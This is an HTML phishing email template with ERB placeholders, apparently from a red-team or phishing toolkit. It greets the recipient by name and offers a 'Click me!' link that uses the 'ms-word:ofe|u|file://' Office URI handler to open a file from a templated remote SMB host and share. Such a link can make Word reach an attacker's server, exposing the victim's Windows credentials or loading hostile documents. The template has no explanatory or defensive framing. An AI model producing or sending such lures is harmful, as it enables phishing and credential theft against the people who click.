<html>
<body>
  <p> Hi there <%= data["name"] %>, </p>

  <p> <a href="ms-word:ofe|u|file://<%= data["ip"] %>/<%= data["share"] %>/<%= data["filename"] %>">Click me!</a></p>

  <p> <%= self.identity[:signature] %></p>
</body>
</html>
